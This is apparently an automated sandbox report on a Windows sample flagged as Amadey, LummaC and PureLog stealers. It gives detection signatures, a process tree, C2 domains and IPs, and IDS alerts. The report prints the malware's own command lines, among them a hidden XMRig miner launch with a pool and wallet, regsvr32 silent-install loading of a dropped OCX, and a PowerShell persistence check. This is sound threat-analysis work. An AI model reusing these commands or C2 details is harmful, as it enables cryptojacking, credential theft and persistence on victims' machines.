Edit tour

Windows Analysis Report
Mc3FDUMnVz.exe

Overview

General Information

Sample name:	Mc3FDUMnVz.exe renamed because original name is a hash value
Original sample name:	dfe7e5e8ff97c65bc0cb46b7a2aab1fd.exe
Analysis ID:	1611334
MD5:	dfe7e5e8ff97c65bc0cb46b7a2aab1fd
SHA1:	b98189cb3246b0fc21eb99e67c43ab09e417bca1
SHA256:	cd2e6080612c7e1cc99b1fae83f25867ddbd350cfd07c96001723d51554d672b
Tags:	Amadeyexeuser-abuse_ch
Infos:

Detection

Amadey, LummaC Stealer, PureLog Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell launch regsvr32

Sigma detected: Xmrig

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected UAC Bypass using CMSTP

.NET source code contains method to dynamically call methods (often used by packers)

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Contains functionality to inject code into remote processes

Detected Stratum mining protocol

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the context of a thread in another process (thread injection)

PE file contains section with special chars

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Potentially Suspicious Child Process Of Regsvr32

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Writes to foreign memory regions

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Sigma detected: Potential Regsvr32 Commandline Flag Anomaly

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Mc3FDUMnVz.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\Mc3FDUMnVz.exe" MD5: DFE7E5E8FF97C65BC0CB46B7A2AAB1FD)

skotes.exe (PID: 7568 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: DFE7E5E8FF97C65BC0CB46B7A2AAB1FD)

skotes.exe (PID: 7560 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: DFE7E5E8FF97C65BC0CB46B7A2AAB1FD)

skotes.exe (PID: 8160 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: DFE7E5E8FF97C65BC0CB46B7A2AAB1FD)

Fe36XBk.exe (PID: 2128 cmdline: "C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe" MD5: B1209205D9A5AF39794BDD27E98134EF)

kUHbhqh.exe (PID: 7376 cmdline: "C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe" MD5: F3B99592F40E424A2FB51E8F60B98077)

cmd.exe (PID: 7568 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\JeDkUsy6Fzs0.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 4316 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 3968 cmdline: ping -n 5 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

Stamp_Setup.exe (PID: 2728 cmdline: "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" MD5: EDD03FA3225E40CA97884CF91EC1DF79)

Stamp_Setup.tmp (PID: 4108 cmdline: "C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmp" /SL5="$C0210,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" MD5: 639207875E87BFD011BFF971435A47DE)

Stamp_Setup.exe (PID: 3636 cmdline: "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT MD5: EDD03FA3225E40CA97884CF91EC1DF79)

Stamp_Setup.tmp (PID: 4860 cmdline: "C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp" /SL5="$901FC,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT MD5: 639207875E87BFD011BFF971435A47DE)

regsvr32.exe (PID: 4248 cmdline: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

regsvr32.exe (PID: 2720 cmdline: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

powershell.exe (PID: 528 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5960 cmdline: "PowerShell.exe" -NoProfile -NonInteractive -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5644 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AddInProcess.exe (PID: 6936 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)

AddInProcess.exe (PID: 7876 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)

Ryu8yUx.exe (PID: 7512 cmdline: "C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe" MD5: 9FB4CDFA069123A0DF2D6A2E6176077B)

Ryu8yUx.exe (PID: 3616 cmdline: "C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe" MD5: 9FB4CDFA069123A0DF2D6A2E6176077B)

WerFault.exe (PID: 3892 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7512 -s 924 MD5: C31336C1EFC2CCB44B4326EA793040F2)

regsvr32.exe (PID: 6216 cmdline: C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

powershell.exe (PID: 7008 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: LummaC

{"C2 url": ["importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "rebeldettern.com", "actiothreaz.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "LkkSUe--liveO"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Ryu8yUx[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000C.00000002.2307708162.00000000045B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000002.00000002.1401755271.0000000000121000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000002.1404710450.0000000000121000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.1374297259.0000000000941000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000C.00000000.2135542163.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.1939471924.0000000000413000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000D.00000002.2258699182.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Ryu8yUx.exe PID: 3616	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: regsvr32.exe PID: 2720	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.2.Ryu8yUx.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
12.0.Ryu8yUx.exe.ff0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.Ryu8yUx.exe.45b9550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.skotes.exe.120000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.Mc3FDUMnVz.exe.940000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
13.2.Ryu8yUx.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
10.2.Fe36XBk.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.2.Fe36XBk.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x12600:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x126a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x12770:$s2: Elevation:Administrator!new:
12.2.Ryu8yUx.exe.45b9550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.Ryu8yUx.exe.45b9550.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
2.2.skotes.exe.120000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 6 entries

Sigma Signatures

Bitcoin Miner

Sigma detected: Xmrig

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2720, ParentProcessName: regsvr32.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, ProcessId: 6936, ProcessName: AddInProcess.exe

System Summary

Sigma detected: Potentially Suspicious Child Process Of Regsvr32

Source: Process started

Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", ProcessId: 528, ProcessName: powershell.exe

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Source: Network Connection

Author: Dmitriy Lifanov, oscd.community: Data: DesusertionIp: 93.88.203.169, DesusertionIsIpv6: false, DesusertionPort: 39001, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 2720, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 51758

Sigma detected: Potential Regsvr32 Commandline Flag Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", CommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp" /SL5="$901FC,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT, ParentImage: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp, ParentProcessId: 4860, ParentProcessName: Stamp_Setup.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ProcessId: 4248, ProcessName: regsvr32.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", ProcessId: 528, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Powershell launch regsvr32

Source: Process started

Author: Joe Security: Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }", ProcessId: 528, ProcessName: powershell.exe

Suricata Signatures

ET COINMINER Observed DNS Query to Cryptocurrency Mining Pool Domain (xmr .2miners .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:52:57.650755+0100	2040353	2	Crypto Currency Mining Activity Detected	192.168.2.9	49281	1.1.1.1	53	UDP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:50:36.809586+0100	2028371	3	Unknown Traffic	192.168.2.9	51681	188.114.96.3	443	TCP
2025-02-10T19:50:37.596134+0100	2028371	3	Unknown Traffic	192.168.2.9	51682	188.114.96.3	443	TCP
2025-02-10T19:50:39.367473+0100	2028371	3	Unknown Traffic	192.168.2.9	51685	188.114.96.3	443	TCP
2025-02-10T19:50:40.373541+0100	2028371	3	Unknown Traffic	192.168.2.9	51689	188.114.96.3	443	TCP
2025-02-10T19:50:41.664734+0100	2028371	3	Unknown Traffic	192.168.2.9	51690	188.114.96.3	443	TCP
2025-02-10T19:50:42.888914+0100	2028371	3	Unknown Traffic	192.168.2.9	51692	188.114.96.3	443	TCP
2025-02-10T19:50:44.513208+0100	2028371	3	Unknown Traffic	192.168.2.9	51694	188.114.96.3	443	TCP
2025-02-10T19:50:46.991330+0100	2028371	3	Unknown Traffic	192.168.2.9	51698	188.114.96.3	443	TCP

ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:50:35.244428+0100	2035595	1	Domain Observed Used for C2 Detected	93.88.203.169	56001	192.168.2.9	51679	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:50:36.988025+0100	2054653	1	A Network Trojan was detected	192.168.2.9	51681	188.114.96.3	443	TCP
2025-02-10T19:50:38.158818+0100	2054653	1	A Network Trojan was detected	192.168.2.9	51682	188.114.96.3	443	TCP
2025-02-10T19:50:47.488464+0100	2054653	1	A Network Trojan was detected	192.168.2.9	51698	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:50:36.988025+0100	2049836	1	A Network Trojan was detected	192.168.2.9	51681	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:50:38.158818+0100	2049812	1	A Network Trojan was detected	192.168.2.9	51682	188.114.96.3	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:50:14.029231+0100	2044696	1	A Network Trojan was detected	192.168.2.9	51669	185.215.113.43	80	TCP
2025-02-10T19:50:18.852284+0100	2044696	1	A Network Trojan was detected	192.168.2.9	51671	185.215.113.43	80	TCP
2025-02-10T19:50:38.159086+0100	2044696	1	A Network Trojan was detected	192.168.2.9	51683	185.215.113.43	80	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:50:44.517672+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.9	51694	188.114.96.3	443	TCP

ETPRO COINMINER XMR CoinMiner Usage

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:52:57.802949+0100	2826930	2	Crypto Currency Mining Activity Detected	192.168.2.9	51780	162.19.139.184	2222	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:50:05.699988+0100	2856147	1	A Network Trojan was detected	192.168.2.9	51665	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:50:13.270987+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.9	51666	TCP
2025-02-10T19:50:37.193584+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.9	51677	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:50:08.898907+0100	2803305	3	Unknown Traffic	192.168.2.9	51667	185.215.113.97	80	TCP
2025-02-10T19:50:14.765687+0100	2803305	3	Unknown Traffic	192.168.2.9	51670	185.215.113.97	80	TCP
2025-02-10T19:50:34.379100+0100	2803305	3	Unknown Traffic	192.168.2.9	51678	185.215.113.97	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-10T19:50:44.517672+0100	2843864	1	A Network Trojan was detected	192.168.2.9	51694	188.114.96.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Mc3FDUMnVz.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://modernakdventure.cyou/3M	Avira URL Cloud: Label: malware
Source: https://modernakdventure.cyou/api	Avira URL Cloud: Label: malware
Source: https://modernakdventure.cyou/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
